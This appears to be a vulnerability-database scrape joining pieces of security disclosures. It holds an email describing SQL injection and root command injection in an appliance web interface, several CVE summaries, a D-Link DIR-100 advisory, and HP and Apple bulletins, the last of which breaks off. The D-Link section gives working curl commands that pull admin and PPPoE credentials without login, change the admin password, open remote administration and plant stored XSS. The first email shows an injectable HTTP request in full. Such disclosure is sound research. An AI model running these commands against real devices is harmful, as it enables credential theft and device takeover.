<p class=3D"">Many instances of SQL injection were found as an unprivileged
read-only authenticated user that allow the user to completely take over th=
e accounts of
other users by using a stacked injection technique to run UPDATE statements=
.
Other techniques available are error-based, time-based, and boolean-based
injections.</p>
<p class=3D"">=A0</p>
<p class=3D"">Several remote command execution vulnerabilities were found
as an administrator which are run as the local root user. By utilising the =
SQL
injections as an unprivileged user, a user can escalate privileges by updat=
ing
the password hash of an admin, and ultimately run commands on the server as
root.</p>
<p class=3D"">=A0</p>
<p class=3D"">However, no data seems to be able to be exfiltrated via the
command injections. You may receive a connect back, but no commands can be =
run
over the connect-back. My solution to this was to pipe the results of comma=
nds
into a file in /tmp, then use the SQL injections to read the file from the =
FS
and return the results.</p>
<p class=3D"">=A0</p>
<p class=3D"">---------------------------------------------------</p>
<p class=3D"">=A0</p>
<p class=3D"">As a read-only user with reporting capabilities, many SQL
injection vectors exist when creating new reports based on filters. You can=
get
to this part of the web app by clicking the Reports menu item at the top-ce=
nter.
The following request contains four exploitable SQL injections each exploit=
able
via a few different techniques:</p>
<p class=3D"">=A0</p>
<p class=3D"">POST /admin/cgi-bin/rpc/doReport/18 HTTP/1.1</p>
<p class=3D"">Host: <a href=3D"http://172.31.16.87:10443">172.31.16.87:1044=
3</a></p>
<p class=3D"">User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:25.0)
Gecko/20100101 Firefox/25.0</p>
<p class=3D"">Accept:
text/html,application/xhtml+xml,application/xml;q=3D0.9,*/*;q=3D0.8</p>
<p class=3D"">Accept-Language: en-US,en;q=3D0.5</p>
<p class=3D"">Accept-Encoding: gzip, deflate</p>
<p class=3D"">Content-Type: text/plain; charset=3DUTF-8</p>
<p class=3D"">Referer: <a href=3D"https://172.31.16.87:10443/admin/969bf547=
d36f6c7e4302952cf72a5ce3/en_US/html/index.html">https://172.31.16.87:10443/=
admin/969bf547d36f6c7e4302952cf72a5ce3/en_US/html/index.html</a></p>
<p class=3D"">Content-Length: 626</p>
<p class=3D"">Cookie:
SCMUserSettings=3DlastUser%3Dusername%26popcheck%3D1%26lang%3Den_US%26last_=
page_id%3Ddashboard;
SHOW_BANNER_NOTICE=3DBannerShown%3D1;
ws_session=3DSID%3D616BF3CC-DA8B-401D-9220-ACED9A0FCD86</p>
<p class=3D"">Connection: keep-alive</p>
<p class=3D"">Pragma: no-cache</p>
<p class=3D"">Cache-Control: no-cache</p>
<p class=3D"">=A0</p>
<p class=3D"">{"id":"loadreport","locale":&qu=
ot;en_US","commands":[{"name":"getDDSData&quo=
t;,"args":{"what":["events"],"filters&qu=
ot;:{"filter_period":"week","start_date":&quo=
t;Now","event_type":"ui_events","event_id&quo=
t;:"all","reason":"all"},"date_range&quo=
t;:"week","events_col":"edate","events_o=
rder":"DESC","events_offset":0,"events_nitems=
":50,"tz":480,"start_date":1385491876.405,"is=
_mail":false,"itemized_nitems":10,"itemized_offset"=
;:0,"emailstatus_nitems":50,"emailstatus_offset":0,&quo=
t;emailstatus_col":"edate","emailstatus_order":&qu=
ot;DESC","dig_filters":[],"dig_category":"&qu=
ot;,"dig_summarize":true,"init":true,"type":&=
quot;ui_events"}}],"filterType":"system","aut=
oconv":1}</p>
<p class=3D"">=A0</p>
<p class=3D"">Within the above request, the events_col, event_id, reason,
events_order, emailstatus_order, and emailstatus_col JSON keys are vulnerab=
le
to SQL injection. You can capture the request with burpsuite and alter each
value by adding an apostrophe to view the SQL error in the response. You ca=
n
also use SQLmap to try various techniques for exploitability.</p>
<p class=3D"">=A0</p>
<p class=3D"">------------------------------------------------------</p>
<p class=3D"">=A0</p>
<p class=3D"">Many remote command execution vulnerabilities exist for
administrator users. Every vector I found was being run as the root user an=
d
they all exists within a single request. As an administrator, go to the Sys=
tem
tab in the top menu. You will be presented with general server settings. Re=
move
the last letter of the hostname, and replace it back. You will now have a g=
reen
checkmark in the top right of the web application. Click this, then click O=
K on
the dialog that pops up in the web app. The next captured request will be t=
he
request susceptible to command execution. It is a very large request with X=
ML
contained in JSON. Because this makes sense.</p>
<p class=3D"">=A0</p>
<p class=3D"">Within this XML, you may search for any XML element whose
=93name=94 attribute contains TestFile. Any of these elements are susceptib=
le to
command injection within the =93value=94 attribute. These filenames seems t=
o be
passed to a utility like =91test=92 to ensure whether or not it exists. By =
using shell
metacharacters, you can execute arbitrary commands on the system as root.</=
p>
<p class=3D"">=A0</p>
<p class=3D"">The hostname within this request is also susceptible to
command injection via shell metacharacters.</p>
<p class=3D"">=A0</p>
<p class=3D"">You may also search for any XML element called Command. Each
of these elements contains a small command to be run on a given event. You =
may
alter any of these to be run as root.</p>
<p class=3D"">=A0</p>
<p class=3D"">You may also search for an XML element called Script. This is
used to manage the cron jobs (make sure the corresponding Enabled element i=
s
set to =931=94 instead of =930=94). You may alter or create any cron jobs t=
hat will be
run as root.</p><div><br></div>-- <br><a href=3D"http://volatile-minds.blog=
spot.com">http://volatile-minds.blogspot.com</a> -- blog<br><a href=3D"http=
://www.volatileminds.net">http://www.volatileminds.net</a> -- website
</div>
--047d7bd6c5d012977c04eca87ee7--
| VAR-201312-0068 | CVE-2013-2825 | Linux Kernel Base of Director Industrial Communication Gateway Device Outstation Component DNP3 Service disruption in services (DoS) Vulnerabilities |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
The DNP3 service in the Outstation component on Elecsys Director Gateway devices with kernel 2.6.32.11ael1 and earlier allows remote attackers to cause a denial of service (CPU consumption and communication outage) via crafted input. Elecsys Director Gateway is prone to a remote denial-of-service vulnerability.
Attackers can exploit this issue to cause denial-of-service conditions. Elecsys Director Industrial Communication Gateway is a set of industrial data communication gateway equipment of Elecsys Company in the United States. The device provides functions such as data acquisition, automatic communication failover, network security, bandwidth management, protocol conversion, and more
| VAR-201312-0235 | CVE-2013-6690 | Cisco Prime Collaboration of Assurance Component Web Interface cross-site scripting vulnerability |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Multiple cross-site scripting (XSS) vulnerabilities in the web interface in the Assurance component in Cisco Prime Collaboration allow remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka Bug IDs CSCui92643, CSCui94038, and CSCui94161. Vendors have confirmed this vulnerability Bug ID CSCui92643 , CSCui94038 ,and CSCui94161 It is released as.By any third party Web Script or HTML May be inserted.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
This issue is being tracked by Cisco Bug ID CSCui92643, CSCui94038, and CSCui94161. Cisco Prime Collaboration is a set of enterprise collaboration network management solutions from Cisco. This solution supports simplified unified communication and video collaboration network management through a unified management console, and rapid deployment of communication sites. The vulnerability stems from the fact that the page does not adequately sanitize user input. A remote attacker can exploit this vulnerability to inject arbitrary code or HTML, and obtain the user's access credentials
| VAR-201312-0452 | CVE-2013-6703 | Cisco ONS 15454 Controller card TLS/SSLv3 Service disruption in modules (DoS) Vulnerabilities |
CVSS V2: 7.1 CVSS V3: - Severity: HIGH |
The TLS/SSLv3 module on Cisco ONS 15454 controller cards allows remote attackers to cause a denial of service (card reset) via crafted (1) TLS or (2) SSLv3 packets, aka Bug ID CSCuh34787.
An attacker can exploit this issue to cause the control card to reset, denying service to legitimate users.
This issue is being tracked by Cisco bug ID CSCuh34787. Cisco ONS 15454 is a set of optical network multi-service transmission platform of American Cisco (Cisco). The platform leverages optical transport technologies such as Resilient Packet Ring (RPR), SDH, and DWDM/CWDM to integrate Ethernet, IP, storage, and TDM services to deliver next-generation voice, data services, and more. Controller Cards is one of the control cards. The vulnerability is caused by the program not properly filtering TLS/SSLv3 packets
| VAR-201312-0453 | CVE-2013-6704 | Cisco IOS XE Service disruption in (DoS) Vulnerabilities |
CVSS V2: 7.1 CVSS V3: - Severity: HIGH |
Cisco IOS XE does not properly manage memory for TFTP UDP flows, which allows remote attackers to cause a denial of service (memory consumption) via TFTP (1) client or (2) server traffic, aka Bug IDs CSCuh09324 and CSCty42686. Cisco IOS is the interconnected network operating system used on most Cisco system routers and network switches. A denial of service vulnerability exists in Cisco IOS XE Software. An attacker can exploit the vulnerability to consume excess memory and cause the device to crash, denying service to legitimate users.
This issue is being tracked by Cisco Bug ID CSCuh09324 and CSCty42686. The vulnerability is caused by the program not properly freeing memory
| VAR-201312-0454 | CVE-2013-6705 | Cisco IOS and IOS XE of IP Device Tracking Service disruption in functionality (DoS) Vulnerabilities |
CVSS V2: 6.1 CVSS V3: - Severity: MEDIUM |
The IP Device Tracking (IPDT) feature in Cisco IOS and IOS XE allows remote attackers to cause a denial of service (IPDT AVL corruption and device reload) via a crafted sequence of ARP packets, aka Bug ID CSCuh38133. Cisco IOS is the interconnected network operating system used on most Cisco system routers and network switches. The vulnerability is due to IPDT AVL corruption. Sending a special ARP packet to the affected device can trigger the vulnerability and overload the device. Cisco IOS and IOS XE Software are prone to a remote denial-of-service vulnerability.
Successful exploits may allow attackers to cause the device to reload, denying service to legitimate users.
This issue is being tracked by Cisco Bug ID CSCuh38133
| VAR-202002-0670 | CVE-2013-7055 | D-Link DIR-100 Vulnerable to insufficient protection of credentials |
CVSS V2: 5.0 CVSS V3: 9.8 Severity: CRITICAL |
D-Link DIR-100 4.03B07 has PPTP and poe information disclosure. D-Link DIR-100 Contains a vulnerability related to insufficient protection of credentials.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. D-Link DIR-100 Ethernet Broadband Router is a broadband router device. The D-Link DIR-100 Ethernet Broadband Router fails to properly restrict special access to users, allowing remote attackers to exploit vulnerabilities without having to verify the submission request and obtain information such as PPTP, POE, and Dyndns username and password. D-Link DIR-100 is prone to the following security vulnerabilities:
1. An authentication-bypass vulnerability
2. Multiple information-disclosure vulnerabilities
3. A cross-site request-forgery vulnerability
4. A cross-site scripting vulnerability
An attacker can exploit these issues to execute HTML and arbitrary script code in the browser of an unsuspecting user in the context of the affected device, steal cookie-based authentication credentials, bypass-authentication mechanism, gain access to potentially sensitive information. Other attacks are also possible. * Title: Router D-Link DIR-100 Multiple Vulnerabilities
* Date: 2013-12-18
* Author: Felix Richter
* Contact: root@euer.krebsco.de
* Vulnerable Software: ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b07_ALL_de_20120410.zip
* Patched Software: ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b13_ALL_de_20131011.zip
* Report Version: 2.0
* Report URL: http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt
* Vulnerable: D-Link DIR-100
* Hardware Revision: D1
* Software Version: 4.03B07 (from 2012-04-10)
* CVE Numbers:
* CWE-287 Authentication Issues: CVE-2013-7051
* CWE-255 Issues with Credential Management: CVE-2013-7052
* CWE-352 Cross-Site Request Forgery: CVE-2013-7053
* CWE-79 Cross-Site Scripting: CVE-2013-7054
* CWE-200 Information Disclosure: CVE-2013-7055
* Google Dork: "D-Link Systems" inurl:bsc_internet.htm D1
* State: Patched by Vendor
* Link to Vendor Report: http://more.dlink.de/sicherheit/news.html#news8
# Table of Contents
1. Background
2. Technical Description
4. Severity and Remediation
5. Timeline
# 1. Background
The DIR-100 is designed for easy and robust connectivity among heterogeneous
standards-based network devices. Computers can communicate directly with this
router for automatic opening and closing of UDP/TCP ports to take full
advantage of the security provided without sacrificing functionality of on-line
applications.
# 2 Vulnerability Description
Multiple vulnerabilities have been found in the D-Link DIR-100 Ethernet
Broadband Router Revision D (and potentially other devices sharing the
affected firmware) that could allow a remote attacker:
- Retrieve the Administrator password without authentication leading to
authentication bypass [CWE-255]
- Retrieve sensitive configuration paramters like the pppoe username and
password without authentication [CWE-200]
- Execute privileged Commands without authentication through a race
condition leading to weak authentication enforcement [CWE-287]
- Sending formatted request to a victim which then will execute arbitrary
commands on the device (CSRF) [CWE-352]
- Store arbitrary javascript code which will be executed when a victim
accesses the administrator interface [CWE-79]
CVE-Numbers for these vulnerabilities has not yet been assigned.
# 3 Technical Description of the Vulnerabilities
## 3.0 The DIR-100 Web Interface and CGI
The DIR-100 Web interface provides a cgi-script on `/cliget.cgi` for
unauthenticated users and `/cli.cgi` for authenticated requests.
list of features provided by each cgi-script can be retrieved by:
curl 'http://192.168.1.104/cliget.cgi?cmd=help'
# and respectively when authenticated
curl 'http://192.168.1.104/cli.cgi?cmd=help'
## 3.1 Authentication Bypass
### Description
The administrator password is not protected in any way on the device, every
attacker with access to the administrator interface which listens on port 80.
For retrieving the Administrator password the request must not be
authenticated.
### Proof of Concept
The web interface provides two distinct ways to retrieve the adminstrator
password:
curl 'http://192.168.0.1/cliget.cgi?cmd=$sys_user1'
curl 'http://192.168.0.1/cliget.cgi?cmd=easysetup%20summary'
## 3.2 Weak Authentication
### Description
As soon as a user is logged into the administration interface, the cli CGI
is `unlocked` and can be used by without authenticating before as
the cgi-script does not check any other authentication parameters such as
cookies or HTTP Parameters. The only access check is if the IP-Address is
the same.
### Proof of Concept
# open the router interface in a web browser and log in
firefox 'http://192.168.0.1/'
# open a new terminal or another web-browser which is currently not logged
# in and try to access
curl 'http://192.168.0.1/cli.cgi?cmd=help'
# this request will be authenticated and it will not be redirected to the
# login page. If no user is logged in, the request will be redirected to
# the login
## 3.3 Retrieve sensitive information
### Description
Besides retrieving the administrator password without authentication it is
possible to retrieve other sensitive configuration from the device as well like
the PPTP and poe Username and Password, as well as the configured dyndns
username and password and configured mail log credentials when these parameters
are configured.
No authentication is requred.
### Proof of Concept
curl 'http://192.168.0.1/cliget.cgi?cmd=$ddns1'
curl 'http://192.168.0.1/cliget.cgi?cmd=$poe_user'
curl 'http://192.168.0.1/cliget.cgi?cmd=$poe_pass'
curl 'http://192.168.0.1/cliget.cgi?cmd=$pptp_user'
curl 'http://192.168.0.1/cliget.cgi?cmd=$pptp_pass'
curl 'http://192.168.0.1/cliget.cgi?cmd=$log_mail_user'
curl 'http://192.168.0.1/cliget.cgi?cmd=$log_mail_pwd'
## 3.4 Cross-Site Request Forgery (CSRF)
### Description
CSRF attacks can be launched by sending a formatted request to a victim, then
tricking the victim into loading the request (often automatically), which
makes it appear that the request came from the victim. As an example the
attacker could change the administrator password (see Proof of Concept code)
and enable system remote access.
### Proof of Concept
Changing the password for administrator can be done when the ip-address is
authenticated:
# Log into DIR-100
curl -X POST -d 'uname=admin&pws=password&login=Login' 'http://192.168.0.1/login.htm'
# Change password
curl 'http://192.168.0.1/cli.cgi?cmd=$sys_user1=user=admin&pass=c%;$sys_passHash=4%25;commit'
# enable remote console
curl 'http://192.168.0.1/cli.cgi?cmd=$sys_remote_enable=1%25;$sys_remote_ip=0.0.0.0%25;$sys_remote_port=80%25;commit'
## 3.5 Cross-Site Scripting (XSS)
### Description
It is possible for an authenticated user to store information on the server
which will not be checked on the server side for special characters which
results in persistent Cross-Site Scripting Vulnerabilities. With this
vulnerabilty the victim (administrator) will run javascript code in the
context of the D-Link DIR-100.
XSS is possible because only on the client side (javascript code) the input is
filtered and validated, sending data directly to the CGI scripts.
### Proof of Concept
# Log into DIR-100
curl -X POST -d 'uname=admin&pws=password&login=Login' 'http://192.168.0.1/login.htm'
# XSS in Static IP Address Tab
curl 'http://192.168.1.104/cli.cgi?cmd=dhcps%20set%20name=<script>alert(1)</script>%26ip=192.168.0.199%26mac=00:11:22:33:44:55%26flg=1%26exp='
# XSS in Scheduler tab
curl 'http://192.168.1.104/cli.cgi?cmd=$sched2=schen=1%26time=0-60%26day=5%26desc=<script>alert(1)</script>%26use=0%26idx=2%26;commit'
# 4 Severity and Remediation
This exploits are considered very critical, especially when the feature of remote
administration is activated on the system.
Weak authentication, together with cross-site request forgery and authentication
bypass can result in a full device compromise from an arbitrary website the victim is
accessing, even if the device has remote administration deactivated on the
internet-port. It is recommended to upgrade the router with the newest firmware
of the D-Link DIR-100.
# 5 Timeline
2013-09-13 - First Contact with D-Link Support
2013-09-19 - Sent Report
2013-10-14 - Request Status update, Response: Beta will be available mid October
2013-12-02 - Vendor publishes Firmware Update
2013-12-11 - Request CVE-IDs
2013-12-18 - Publish the report
| VAR-201401-0137 | CVE-2013-5987 | NVIDIA In graphics drivers GPU Vulnerability that can bypass access restrictions |
CVSS V2: 7.2 CVSS V3: - Severity: HIGH |
Unspecified vulnerability in NVIDIA graphics driver Release 331, 325, 319, 310, and 304 allows local users to bypass intended access restrictions for the GPU and gain privileges via unknown vectors. NVIDIA Graphics Drivers are prone to a local privilege-escalation vulnerability.
A local attacker may exploit this issue to gain escalated privileges and execute arbitrary code with escalated privileges. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c04036775
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c04036775
Version: 1
HPSBHF02946 rev.1 - HP Servers with NVIDIA GPU Computing Driver, Elevation of
Privilege
NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.
Release Date: 2014-05-09
Last Updated: 2014-05-09
Potential Security Impact: Elevation of privilege
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY
A potential security vulnerability has been identified with certain HP
servers that use NVIDIA Computing GPU processors. The vulnerability could be
exploited resulting in an elevation of privilege.
References: CVE-2013-5987, SSRT101355
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
Server
GPU type(s)
DL360 G7
Q4000
SL390s G7
M2050, M2070, M2070Q, M2075, M2090
DL160 Gen8
Q4000
ML350p Gen8
Q4000, Q6000
DL360e Gen8
Q4000
DL380e Gen8
Q4000, Q6000
SL250s Gen8
M2070Q, M2075, M2090, K10, K20, K20X
SL270s Gen8
M2070Q, M2075, M2090, K10, K20, K20X
BACKGROUND
CVSS 2.0 Base Metrics
===========================================================
Reference Base Vector Base Score
CVE-2013-5987 (AV:L/AC:M/Au:S/C:C/I:C/A:C) 6.6
===========================================================
Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002
The Hewlett-Packard Company thanks NVIDIA and Marcin Kocielnicki from the
X.Org Foundation Nouveau project for reporting this issue to
security-alert@hp.com.
RESOLUTION
HP has provided an updated NVIDIA firmware driver version that resolves the
security vulnerability. Download the firmware driver from hp.com
Go to support and drivers.
Search for the server model and then choose the operating system.
Select "Driver - NVIDIA Computing."
Note:
For Windows choose the Driver NVIDIA Computing v3.21.01 or a subsequent
version
For Linux choose the Driver NVIDIA Computing v3.19.72 or a subsequent version
HISTORY
Version:1 (rev.1) - 9 May 2014 Initial release
Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is
available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.
3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX
Copyright 2014 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors
or omissions contained herein. The information provided is provided "as is"
without warranty of any kind. To the extent permitted by law, neither HP or
its affiliates, subcontractors or suppliers will be liable for
incidental,special or consequential damages including downtime cost; lost
profits; damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice.
Hewlett-Packard Company and the names of Hewlett-Packard products referenced
herein are trademarks of Hewlett-Packard Company in the United States and
other countries. Other product and company names mentioned herein may be
trademarks of their respective owners.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.13 (GNU/Linux)
iEYEARECAAYFAlNtE/EACgkQ4B86/C0qfVmMDwCgoDqC5FS8nW8RTOHZAUUqCZIY
0uIAn0TrMahIzRFsCo6DfAc8/FsNsz6f
=mv1t
-----END PGP SIGNATURE-----
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
APPLE-SA-2014-02-25-1 OS X Mavericks 10.9.2 and Security Update
2014-001
OS X Mavericks 10.9.2 and Security Update 2014-001 is now available
and addresses the following:
Apache
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 and 10.9.1
Impact: Multiple vulnerabilities in Apache
Description: Multiple vulnerabilities existed in Apache, the most
serious of which may lead to cross-site scripting. These issues were
addressed by updating Apache to version 2.2.26.
CVE-ID
CVE-2013-1862
CVE-2013-1896
App Sandbox
Available for: OS X Mountain Lion v10.8.5
Impact: The App Sandbox may be bypassed
Description: The LaunchServices interface for launching an
application allowed sandboxed apps to specify the list of arguments
passed to the new process. A compromised sandboxed application could
abuse this to bypass the sandbox. This issue was addressed by
preventing sandboxed applications from specifying arguments. This
issue does not affect systems running OS X Mavericks 10.9 or later.
CVE-ID
CVE-2013-5179 : Friedrich Graeter of The Soulmen GbR
ATS
Available for: OS X Mountain Lion v10.8.5,
OS X Mavericks 10.9 and 10.9.1
Impact: Viewing or downloading a document containing a maliciously
crafted embedded font may lead to arbitrary code execution
Description: A memory corruption issue existed in the handling of
handling of Type 1 fonts. This issue was addressed through improved
bounds checking.
CVE-ID
CVE-2014-1254 : Felix Groebert of the Google Security Team
ATS
Available for: OS X Mavericks 10.9 and 10.9.1
Impact: The App Sandbox may be bypassed
Description: A memory corruption issue existed in the handling of
Mach messages passed to ATS. This issue was addressed through
improved bounds checking.
CVE-ID
CVE-2014-1262 : Meder Kydyraliev of the Google Security Team
ATS
Available for: OS X Mavericks 10.9 and 10.9.1
Impact: The App Sandbox may be bypassed
Description: An arbitrary free issue existed in the handling of Mach
messages passed to ATS. This issue was addressed through additional
validation of Mach messages.
CVE-ID
CVE-2014-1255 : Meder Kydyraliev of the Google Security Team
ATS
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 and 10.9.1
Impact: The App Sandbox may be bypassed
Description: A buffer overflow issue existed in the handling of Mach
messages passed to ATS. This issue was addressed by additional bounds
checking.
CVE-ID
CVE-2014-1256 : Meder Kydyraliev of the Google Security Team
Certificate Trust Policy
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 and 10.9.1
Impact: Root certificates have been updated
Description: The set of system root certificates has been updated.
The complete list of recognized system roots may be viewed via the
Keychain Access application.
CFNetwork Cookies
Available for: OS X Mountain Lion v10.8.5
Impact: Session cookies may persist even after resetting Safari
Description: Resetting Safari did not always delete session cookies
until Safari was closed. This issue was addressed through improved
handling of session cookies. This issue does not affect systems
running OS X Mavericks 10.9 or later.
CVE-ID
CVE-2014-1257 : Rob Ansaldo of Amherst College, Graham Bennett
CoreAnimation
Available for: OS X Mountain Lion v10.8.5,
OS X Mavericks 10.9 and 10.9.1
Impact: Visiting a maliciously crafted site may lead to an
unexpected application termination or arbitrary code execution
Description: A heap buffer overflow existed in CoreAnimation's
handling of images. This issue was addressed through improved bounds
checking.
CVE-ID
CVE-2014-1258 : Karl Smith of NCC Group
CoreText
Available for: OS X Mavericks 10.9 and 10.9.1
Impact: Applications that use CoreText may be vulnerable to an
unexpected application termination or arbitrary code execution
Description: A signedness issue existed in CoreText in the handling
of Unicode fonts. This issue is addressed through improved bounds
checking.
CVE-ID
CVE-2014-1261 : Lucas Apa and Carlos Mario Penagos of IOActive Labs
curl
Available for: OS X Mavericks 10.9 and 10.9.1
Impact: An attacker with a privileged network position may intercept
user credentials or other sensitive information
Description: When using curl to connect to an HTTPS URL containing
an IP address, the IP address was not validated against the
certificate. This issue does not affect systems prior to OS X
Mavericks v10.9.
CVE-ID
CVE-2014-1263 : Roland Moriz of Moriz GmbH
Data Security
Available for: OS X Mavericks 10.9 and 10.9.1
Impact: An attacker with a privileged network position may capture
or modify data in sessions protected by SSL/TLS
Description: Secure Transport failed to validate the authenticity of
the connection. This issue was addressed by restoring missing
validation steps.
CVE-ID
CVE-2014-1266
Date and Time
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 and 10.9.1
Impact: An unprivileged user may change the system clock
Description: This update changes the behavior of the systemsetup
command to require administrator privileges to change the system
clock.
CVE-ID
CVE-2014-1265
File Bookmark
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 and 10.9.1
Impact: Viewing a file with a maliciously crafted name may lead to
an unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in the handling of file
names. This issue was addressed through improved bounds checking.
CVE-ID
CVE-2014-1259
Finder
Available for: OS X Mavericks 10.9 and 10.9.1
Impact: Accessing a file's ACL via Finder may lead to other users
gaining unauthorized access to files
Description: Accessing a file's ACL via Finder may corrupt the ACLs
on the file. This issue was addressed through improved handling of
ACLs.
CVE-ID
CVE-2014-1264
ImageIO
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 and 10.9.1
Impact: Viewing a maliciously crafted JPEG file may lead to the
disclosure of memory contents
Description: An uninitialized memory access issue existed in
libjpeg's handling of JPEG markers, resulting in the disclosure of
memory contents. This issue was addressed by better JPEG handling.
CVE-ID
CVE-2013-6629 : Michal Zalewski
IOSerialFamily
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8.5
Impact: Executing a malicious application may result in arbitrary
code execution within the kernel
Description: An out of bounds array access existed in the
IOSerialFamily driver. This issue was addressed through additional
bounds checking. This issue does not affect systems running OS X
Mavericks v10.9 or later.
CVE-ID
CVE-2013-5139 : @dent1zt
LaunchServices
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8.5
Impact: A file could show the wrong extension
Description: An issue existed in the handling of certain unicode
characters that could allow filenames to show incorrect extensions.
The issue was addressed by filtering unsafe unicode characters from
display in filenames. This issue does not affect systems running OS X
Mavericks v10.9 or later.
CVE-ID
CVE-2013-5178 : Jesse Ruderman of Mozilla Corporation, Stephane Sudre
of Intego
NVIDIA Drivers
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 and 10.9.1
Impact: Executing a malicious application could result in arbitrary
code execution within the graphics card
Description: An issue existed that allowed writes to some trusted
memory on the graphics card. This issue was addressed by removing the
ability of the host to write to that memory.
CVE-ID
CVE-2013-5986 : Marcin KoĆcielnicki from the X.Org Foundation
Nouveau project
CVE-2013-5987 : Marcin KoĆcielnicki from the X.Org Foundation
Nouveau project
PHP
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 and 10.9.1
Impact: Multiple vulnerabilities in PHP
Description: Multiple vulnerabilities existed in PHP, the most
serious of which may have led to arbitrary code execution. These
issues were addressed by updating PHP to version 5.4.22 on OS X
Mavericks v10.9, and 5.3.28 on OS X Lion and Mountain Lion.
CVE-ID
CVE-2013-4073
CVE-2013-4113
CVE-2013-4248
CVE-2013-6420
QuickLook
Available for: OS X Mountain Lion v10.8.5
Impact: Downloading a maliciously crafted Microsoft Office file may
lead to an unexpected application termination or arbitrary code
execution
Description: A memory corruption issue existed in QuickLook's
handling of Microsoft Office files. Downloading a maliciously crafted
Microsoft Office file may have led to an unexpected application
termination or arbitrary code execution. This issue does not affect
systems running OS X Mavericks 10.9 or later.
CVE-ID
CVE-2014-1260 : Felix Groebert of the Google Security Team
QuickLook
Available for: OS X Mountain Lion v10.8.5,
OS X Mavericks 10.9 and 10.9.1
Impact: Downloading a maliciously crafted Microsoft Word document
may lead to an unexpected application termination or arbitrary code
execution
Description: A double free issue existed in QuickLook's handling of
Microsoft Word documents. This issue was addressed through improved
memory management.
CVE-ID
CVE-2014-1252 : Felix Groebert of the Google Security Team
QuickTime
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 and 10.9.1
Impact: Playing a maliciously crafted movie file may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in the handling of 'ftab'
atoms. This issue was addressed through improved bounds checking.
CVE-ID
CVE-2014-1246 : An anonymous researcher working with HP's Zero Day
Initiative
QuickTime
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 and 10.9.1
Impact: Playing a maliciously crafted movie file may lead to an
unexpected application termination or arbitrary code execution
Description: A memory corruption issue existed in the handling of
'dref' atoms. This issue was addressed through improved bounds
checking.
CVE-ID
CVE-2014-1247 : Tom Gallagher & Paul Bates working with HP's Zero Day
Initiative
QuickTime
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 and 10.9.1
Impact: Playing a maliciously crafted movie file may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in the handling of 'ldat'
atoms. This issue was addressed through improved bounds checking.
CVE-ID
CVE-2014-1248 : Jason Kratzer working with iDefense VCP
QuickTime
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 and 10.9.1
Impact: Viewing a maliciously crafted PSD image may lead to an
unexpected application termination or arbitrary code execution
